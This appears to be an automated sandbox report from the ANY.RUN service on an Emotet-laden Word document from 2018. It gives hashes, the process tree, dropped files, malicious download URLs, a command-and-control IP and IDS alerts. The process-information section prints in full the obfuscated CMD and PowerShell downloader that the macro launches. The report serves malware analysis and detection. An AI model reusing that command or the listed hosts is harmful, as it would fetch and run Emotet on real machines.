analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Acc_R352911.doc

Full analysis: https://app.any.run/tasks/caeb9501-28d4-457b-92e2-585d966f3754
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 15:35:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Kylie-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 17:15:00 2018, Last Saved Time/Date: Tue Nov 13 17:15:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

44941C53E468E1594717B9B4FC5B91AB

SHA1:

65F92D5AECA2824B9F8F3EB1A9CDDAFD6884A3BE

SHA256:

9D8E69481C6796BE9E7A0DEE2C05557082BB395F5D49F3992CF7F6FD18DE6057

SSDEEP:

1536:ByJocn1kp59gxBK85fBt+a9ZRjYOMKBf+nE9KYFd1NoNrPJ+o2b79IpG4C+w:B341k/W48pjYOMKBf+nE9KYFd1NoNrPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 772)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1700)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 772)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3164)
    • Application was dropped or rewritten from another process

      • 614.exe (PID: 3688)
      • 614.exe (PID: 3480)
      • lpiograd.exe (PID: 3416)
      • lpiograd.exe (PID: 1308)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3164)
    • Emotet process was detected

      • lpiograd.exe (PID: 1308)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3164)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3164)
      • 614.exe (PID: 3688)
    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 2252)
    • Connects to unusual port

      • lpiograd.exe (PID: 3416)
    • Starts itself from another location

      • 614.exe (PID: 3688)
    • Application launched itself

      • lpiograd.exe (PID: 1308)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 772)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:13 17:15:00
CreateDate: 2018:11:13 17:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Kylie-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 614.exe no specs 614.exe #EMOTET lpiograd.exe no specs lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
772"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Acc_R352911.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2252CMD /c C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd^&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( ^&", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1700C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( &", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')"C:\windOws\sYstem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3164poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) | & ( \"{0}{1}\" -f 'iE','X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3480"C:\Users\admin\AppData\Local\Temp\614.exe" C:\Users\admin\AppData\Local\Temp\614.exepowershell.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
3688"C:\Users\admin\AppData\Local\Temp\614.exe"C:\Users\admin\AppData\Local\Temp\614.exe
614.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
1308"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
614.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
3416"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Version:
8.0.0.0
Total events
1 684
Read events
1 270
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A09.tmp.cvr
MD5:
SHA256:
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FW0WBZEGMOYSQWD4BYD5.temp
MD5:
SHA256:
3164powershell.exeC:\Users\admin\AppData\Local\Temp\614.exe
MD5:
SHA256:
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da563.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3164powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
772WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6589D293BDFBCC8FEAFEB84500BD9D91
SHA256:8837595E0E07F50291B6B5E8F1BFC8108A72BE970841E2F9F5E3CE71C7FD94DE
772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$c_R352911.docpgc
MD5:C4B2CEAAA7BD1524ECD55966417E99ED
SHA256:1FC20EB5252FC315E973B7B6BAE88146FC93701F67EB5571AEDAF6853C5A7F1D
3688614.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:1971BD3C2B25CE33550085B93144EBFB
SHA256:D6DD56E7FB1CC71FC37199B60461E657726C3BF8319CE59177AB4BE6ED3B9FB4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3164
powershell.exe
GET
204.152.208.130:80
http://akucakep.com/JhVWKzotm/
US
malicious
3416
lpiograd.exe
GET
50.78.167.65:7080
http://50.78.167.65:7080/
US
malicious
3164
powershell.exe
GET
301
204.152.208.130:80
http://akucakep.com/JhVWKzotm
US
html
1.12 Kb
malicious
3164
powershell.exe
GET
301
82.200.247.240:80
http://litmuseum.kz/l6lbBW8pJ
KZ
html
238 b
malicious
3164
powershell.exe
GET
200
82.200.247.240:80
http://litmuseum.kz/l6lbBW8pJ/
KZ
executable
420 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3164
powershell.exe
82.200.247.240:80
litmuseum.kz
JSC Kazakhtelecom
KZ
malicious
3416
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
3164
powershell.exe
204.152.208.130:80
akucakep.com
QuadraNet, Inc
US
suspicious

DNS requests

Domain
IP
Reputation
akucakep.com
  • 204.152.208.130
malicious
litmuseum.kz
  • 82.200.247.240
malicious

Threats

PID
Process
Class
Message
3164
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3164
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3164
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3164
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3164
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3164
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3164
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3164
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info